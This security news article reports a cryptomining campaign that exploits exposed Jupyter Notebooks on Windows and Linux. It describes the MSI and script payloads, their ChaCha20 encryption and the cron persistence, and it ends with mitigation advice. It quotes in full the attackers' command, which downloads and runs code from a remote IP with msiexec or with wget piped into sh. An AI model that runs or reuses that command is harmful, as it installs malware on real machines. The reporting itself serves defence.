Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer

A novel cryptomining campaign has been identified that exploits misconfigured Jupyter Notebooks, targeting both Windows and Linux systems.

The attack leverages exposed instances of Jupyter Notebook, an interactive application widely used by data scientists containing a Python IDE, to deploy malicious code that installs cryptomining software on compromised systems.

The campaign begins by exploiting unsecured Jupyter environments to execute a command that attempts to install malware through multiple methods.

The initial payload attempts to download either an MSI file for Windows systems or a JavaScript file for Linux environments using the command: “(ipconfig && msiexec /i http://45.130.22.219/py0217.msi) || (wget -q -O- http://45.130.22.219/py0217.js|sh)”

Analysts at Cado Security Labs identified this attack through their honeypot systems, noting that the campaign represents a new vector for cryptomining attacks that hasn’t been previously reported, despite sharing similarities with earlier campaigns targeting Ivanti Connect Secure and Korean web servers.

When targeting Windows systems, the attack downloads an MSI installer containing a 64-bit Windows executable named “Binary.freedllbinary.”

This binary loads a secondary payload called “java.exe” which is stored in c:\ProgramData. Despite its name, “java.exe” is actually a malicious binary packed with UPX that retrieves an encrypted blob called “x2.dat” from various repositories including Github, Launchpad, and Gitee.

Attack Chain

The attackers employ sophisticated encryption techniques to hide their payloads.

The “x2.dat” file is encrypted with ChaCha20 using the nonce “aQFabieiNxCjk6ygb1X61HpjGfSKq4zH” and the key “AZIzJi2WxU0G” before being compressed with zlib.

The code to decrypt this payload is as follows:-

from Crypto.Cipher import ChaCha20
import zlib
key = b' '
nonce = b' '
with open('', 'rb') as f:
    ciphertext = f.read()
cipher = ChaCha20.new(key=key, nonce=nonce)
plaintext = cipher. Decrypt(ciphertext)
# Decompress with zlib after decryption
decompressed_data = zlib.decompress(plaintext)

For Linux systems, the attack downloads a bash script “0217.js” that retrieves two ELF binaries and sets up cronjobs to ensure persistence.

The malware targets cryptocurrencies including Monero, Sumokoin, ArQma, and several others, using wallet ID “44Q4cH4jHoAZgyHiYBTU9D7rLsdV82y4EvPRkjgdMQThPLJVB3ZbD9Sc1i84Q9eHYgb9Ze7A3syWV”.

Organizations should implement strong authentication, disable public access to Jupyter instances, and regularly monitor cloud environments for unusual activity to mitigate these attacks.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.